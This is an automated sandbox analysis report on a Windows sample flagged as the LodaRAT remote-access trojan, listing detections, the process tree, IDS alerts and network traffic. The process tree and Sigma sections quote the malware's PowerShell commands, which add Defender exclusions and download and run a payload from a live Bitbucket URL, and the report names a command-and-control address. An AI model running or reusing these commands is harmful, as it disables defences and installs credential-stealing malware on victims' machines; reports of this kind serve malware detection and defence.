Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Gq48hjKhZf.exe

Overview

General Information

Sample name:Gq48hjKhZf.exe
renamed because original name is a hash value
Original sample name:454bf064c19d363b154a419fc69dc693.exe
Analysis ID:1580296
MD5:454bf064c19d363b154a419fc69dc693
SHA1:98beb972b52d32c846e9e485cbf17e9211cbe5ab
SHA256:6a46b3762d71b47d0c728e967ee9129f523689ff70196a953baa3f60c85a26b5
Tags:exeuser-abuse_ch
Infos:

Detection

LodaRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LodaRAT
Yara detected Powershell download and execute
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sleep loop found (likely to delay execution)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • Gq48hjKhZf.exe (PID: 6396 cmdline: "C:\Users\user\Desktop\Gq48hjKhZf.exe" MD5: 454BF064C19D363B154A419FC69DC693)
    • cmd.exe (PID: 3148 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.bat C:\Users\user\Desktop\Gq48hjKhZf.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2828 cmdline: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 6340 cmdline: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')"; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 1784 cmdline: powershell /nop /com "Add-MpPreference -ExclusionProcess C:\Users\user\AppData\Local\Temp\AHPOBS.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 3716 cmdline: cmd.exe /c C:\Users\user\AppData\Local\Temp\AHPOBS.exe; MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • AHPOBS.exe (PID: 6756 cmdline: C:\Users\user\AppData\Local\Temp\AHPOBS.exe ; MD5: A9C526F3A276012D554AC382A90BCA3D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Loda, LodaRATLoda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.loda

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.batJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: Gq48hjKhZf.exe PID: 6396JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: AHPOBS.exe PID: 6756JoeSecurity_LodaRATYara detected LodaRATJoe Security
          Process Memory Space: AHPOBS.exe PID: 6756JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_6340.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.bat C:\Users\user\Desktop\Gq48hjKhZf.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3148, ParentProcessName: cmd.exe, ProcessCommandLine: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", ProcessId: 2828, ProcessName: powershell.exe
              Sigma detected: Suspicious Script Execution From Temp Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.bat C:\Users\user\Desktop\Gq48hjKhZf.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3148, ParentProcessName: cmd.exe, ProcessCommandLine: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", ProcessId: 2828, ProcessName: powershell.exe
              Sigma detected: PowerShell Download Pattern
              Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, CommandLine: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.bat C:\Users\user\Desktop\Gq48hjKhZf.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3148, ParentProcessName: cmd.exe, ProcessCommandLine: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, ProcessId: 6340, ProcessName: powershell.exe
              Sigma detected: PowerShell Web Download
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, CommandLine: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.bat C:\Users\user\Desktop\Gq48hjKhZf.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3148, ParentProcessName: cmd.exe, ProcessCommandLine: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, ProcessId: 6340, ProcessName: powershell.exe
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.bat C:\Users\user\Desktop\Gq48hjKhZf.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3148, ParentProcessName: cmd.exe, ProcessCommandLine: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", ProcessId: 2828, ProcessName: powershell.exe
              Sigma detected: Usage Of Web Request Commands And Cmdlets
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, CommandLine: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.bat C:\Users\user\Desktop\Gq48hjKhZf.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3148, ParentProcessName: cmd.exe, ProcessCommandLine: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";, ProcessId: 6340, ProcessName: powershell.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.bat C:\Users\user\Desktop\Gq48hjKhZf.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3148, ParentProcessName: cmd.exe, ProcessCommandLine: powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", ProcessId: 2828, ProcessName: powershell.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-24T09:03:09.265641+010028221161Malware Command and Control Activity Detected192.168.2.549808172.232.216.2504000TCP
              2024-12-24T09:04:59.614750+010028221161Malware Command and Control Activity Detected192.168.2.549983172.232.216.2504000TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-24T09:02:05.166648+010028498851Malware Command and Control Activity Detected192.168.2.549982172.232.216.2504000TCP
              2024-12-24T09:02:05.166648+010028498851Malware Command and Control Activity Detected192.168.2.549961172.232.216.2504000TCP
              2024-12-24T09:02:05.166648+010028498851Malware Command and Control Activity Detected192.168.2.549983172.232.216.2504000TCP
              2024-12-24T09:02:05.166648+010028498851Malware Command and Control Activity Detected192.168.2.549859172.232.216.2504000TCP
              2024-12-24T09:02:05.166648+010028498851Malware Command and Control Activity Detected192.168.2.549808172.232.216.2504000TCP
              2024-12-24T09:02:05.166648+010028498851Malware Command and Control Activity Detected192.168.2.549910172.232.216.2504000TCP
              2024-12-24T09:03:09.265641+010028498851Malware Command and Control Activity Detected192.168.2.549808172.232.216.2504000TCP
              2024-12-24T09:03:31.346839+010028498851Malware Command and Control Activity Detected192.168.2.549859172.232.216.2504000TCP
              2024-12-24T09:03:53.435333+010028498851Malware Command and Control Activity Detected192.168.2.549910172.232.216.2504000TCP
              2024-12-24T09:04:15.523618+010028498851Malware Command and Control Activity Detected192.168.2.549961172.232.216.2504000TCP
              2024-12-24T09:04:37.566783+010028498851Malware Command and Control Activity Detected192.168.2.549982172.232.216.2504000TCP
              2024-12-24T09:04:59.614750+010028498851Malware Command and Control Activity Detected192.168.2.549983172.232.216.2504000TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Roaming\Windata\svhost.exeAvira: detection malicious, Label: HEUR/AGEN.1321335
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeAvira: detection malicious, Label: HEUR/AGEN.1321335
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeReversingLabs: Detection: 73%
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeVirustotal: Detection: 70%Perma Link
              Source: C:\Users\user\AppData\Roaming\Windata\svhost.exeReversingLabs: Detection: 73%
              Source: C:\Users\user\AppData\Roaming\Windata\svhost.exeVirustotal: Detection: 70%Perma Link
              Multi AV Scanner detection for submitted file
              Source: Gq48hjKhZf.exeVirustotal: Detection: 56%Perma Link
              Source: Gq48hjKhZf.exeReversingLabs: Detection: 39%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Roaming\Windata\svhost.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: Gq48hjKhZf.exeJoe Sandbox ML: detected
              Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 3.5.8.193:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,10_2_004339B6
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00452492
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00442886
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_004788BD
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,10_2_0045CAFA
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00431A86
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,10_2_0044BD27
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0045DE8F FindFirstFileW,FindClose,10_2_0045DE8F
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_0044BF8B
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeFile opened: C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.tmpJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeFile opened: C:\Users\user\AppData\Local\Temp\AC2F.tmpJump to behavior
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exeFile opened: C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmpJump to behavior

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.5:49808 -> 172.232.216.250:4000
              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.5:49808 -> 172.232.216.250:4000
              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.5:49859 -> 172.232.216.250:4000
              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.5:49983 -> 172.232.216.250:4000
              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.5:49983 -> 172.232.216.250:4000
              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.5:49982 -> 172.232.216.250:4000
              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.5:49910 -> 172.232.216.250:4000
              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.5:49961 -> 172.232.216.250:4000
              Source: global trafficHTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/AHPOBS.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/cf91d8e4-02a0-4397-82bb-bdba0a1c2844/AHPOBS.exe?response-content-disposition=attachment%3B%20filename%3D%22AHPOBS.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHZLOXG2B&Signature=SWcM%2FOPeR%2BxliX6J91lSOPwmbQQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECAaCXVzLWVhc3QtMSJHMEUCICYvR56NrQqFga3kiY1aQut3DfJ%2F3mouCTxMKwxxvlu9AiEAzRhWhoYfwpU93W5Kbmk%2F0oFd8SYZ7SecTeJWwbrr4q8qsAII6f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDNT8poD5wcY6mW%2FA9CqEAsyA5lBS36qs0C9g9fabbm0%2BVPJMoKBXvx06v5%2Bhz4MgRV76W4zkdth%2BCfqilJsCo1BEjkNvg0i27Nz7jMqfQuuIPabkIIZ8Jx0JPukqPqdaH2Br%2FJfu%2BbniBu%2FF%2BMDbd6sGF6faz5wxQbZrU9mN6UV2zn6lvu%2BVHhzGTsDSS%2BMrycK8iTHC2yvERkyiZy7JbG%2BP2dGK3Q%2FftHqyyhaseC0Ew4%2FSdXJlfsKXP7vCUL86eSou6pISsSLwuDc%2Byrgz0Stvci9kY%2F7ciYEzd1oCJ0cmOCOC5nDZvo%2FjmidwltfgIvSSK44XdxhPAAdlx4hmiuIgWsQl9%2Biqj8YhkLMQy22TRNHaMKTUqbsGOp0BTHIfIOC4Yhi8ptO9erjj5vxgbcnFwUWN2iNmempfYjp0od53cyJ%2Fs4GEYpDAK6GmYToRGlTJNyLpnp5mWyllHFhlS4MgWZ%2FiOhFUhQFfPxKT6JeUDOj0QsfykBEnb3FQyIvkEHL38u8vQu5i2OzM7YRDr5j3DJKcINym92AHCx2gN6Byj%2F2vvZcmQSR7GQK3BQkqucQ7RpgTHC7wCA%3D%3D&Expires=1735029036 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 185.166.143.49 185.166.143.49
              Source: Joe Sandbox ViewASN Name: AKAMAI-ASN1EU AKAMAI-ASN1EU
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownTCP traffic detected without corresponding DNS query: 172.232.216.250
              Source: unknownTCP traffic detected without corresponding DNS query: 172.232.216.250
              Source: unknownTCP traffic detected without corresponding DNS query: 172.232.216.250
              Source: unknownTCP traffic detected without corresponding DNS query: 172.232.216.250
              Source: unknownTCP traffic detected without corresponding DNS query: 172.232.216.250
              Source: unknownTCP traffic detected without corresponding DNS query: 172.232.216.250
              Source: unknownTCP traffic detected without corresponding DNS query: 172.232.216.250
              Source: unknownTCP traffic detected without corresponding DNS query: 172.232.216.250
              Source: unknownTCP traffic detected without corresponding DNS query: 172.232.216.250
              Source: unknownTCP traffic detected without corresponding DNS query: 172.232.216.250
              Source: unknownTCP traffic detected without corresponding DNS query: 172.232.216.250
              Source: unknownTCP traffic detected without corresponding DNS query: 172.232.216.250
              Source: unknownTCP traffic detected without corresponding DNS query: 172.232.216.250
              Source: unknownTCP traffic detected without corresponding DNS query: 172.232.216.250
              Source: unknownTCP traffic detected without corresponding DNS query: 172.232.216.250
              Source: unknownTCP traffic detected without corresponding DNS query: 172.232.216.250
              Source: unknownTCP traffic detected without corresponding DNS query: 172.232.216.250
              Source: unknownTCP traffic detected without corresponding DNS query: 172.232.216.250
              Source: unknownTCP traffic detected without corresponding DNS query: 172.232.216.250
              Source: unknownTCP traffic detected without corresponding DNS query: 172.232.216.250
              Source: unknownTCP traffic detected without corresponding DNS query: 172.232.216.250
              Source: unknownTCP traffic detected without corresponding DNS query: 172.232.216.250
              Source: unknownTCP traffic detected without corresponding DNS query: 172.232.216.250
              Source: unknownTCP traffic detected without corresponding DNS query: 172.232.216.250
              Source: unknownTCP traffic detected without corresponding DNS query: 172.232.216.250
              Source: unknownTCP traffic detected without corresponding DNS query: 172.232.216.250
              Source: unknownTCP traffic detected without corresponding DNS query: 172.232.216.250
              Source: unknownTCP traffic detected without corresponding DNS query: 172.232.216.250
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_004422FE InternetQueryDataAvailable,InternetReadFile,10_2_004422FE
              Source: global trafficHTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/AHPOBS.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/cf91d8e4-02a0-4397-82bb-bdba0a1c2844/AHPOBS.exe?response-content-disposition=attachment%3B%20filename%3D%22AHPOBS.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHZLOXG2B&Signature=SWcM%2FOPeR%2BxliX6J91lSOPwmbQQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECAaCXVzLWVhc3QtMSJHMEUCICYvR56NrQqFga3kiY1aQut3DfJ%2F3mouCTxMKwxxvlu9AiEAzRhWhoYfwpU93W5Kbmk%2F0oFd8SYZ7SecTeJWwbrr4q8qsAII6f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDNT8poD5wcY6mW%2FA9CqEAsyA5lBS36qs0C9g9fabbm0%2BVPJMoKBXvx06v5%2Bhz4MgRV76W4zkdth%2BCfqilJsCo1BEjkNvg0i27Nz7jMqfQuuIPabkIIZ8Jx0JPukqPqdaH2Br%2FJfu%2BbniBu%2FF%2BMDbd6sGF6faz5wxQbZrU9mN6UV2zn6lvu%2BVHhzGTsDSS%2BMrycK8iTHC2yvERkyiZy7JbG%2BP2dGK3Q%2FftHqyyhaseC0Ew4%2FSdXJlfsKXP7vCUL86eSou6pISsSLwuDc%2Byrgz0Stvci9kY%2F7ciYEzd1oCJ0cmOCOC5nDZvo%2FjmidwltfgIvSSK44XdxhPAAdlx4hmiuIgWsQl9%2Biqj8YhkLMQy22TRNHaMKTUqbsGOp0BTHIfIOC4Yhi8ptO9erjj5vxgbcnFwUWN2iNmempfYjp0od53cyJ%2Fs4GEYpDAK6GmYToRGlTJNyLpnp5mWyllHFhlS4MgWZ%2FiOhFUhQFfPxKT6JeUDOj0QsfykBEnb3FQyIvkEHL38u8vQu5i2OzM7YRDr5j3DJKcINym92AHCx2gN6Byj%2F2vvZcmQSR7GQK3BQkqucQ7RpgTHC7wCA%3D%3D&Expires=1735029036 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: bitbucket.org
              Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
              Source: AHPOBS.exe, 0000000A.00000002.3917281213.0000000003E85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.amazonaws.com/
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/
              Source: AHPOBS.exe, 0000000A.00000002.3917281213.0000000003E85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/files/beta/autoit/archive/sqlite/SQLite3O:Te
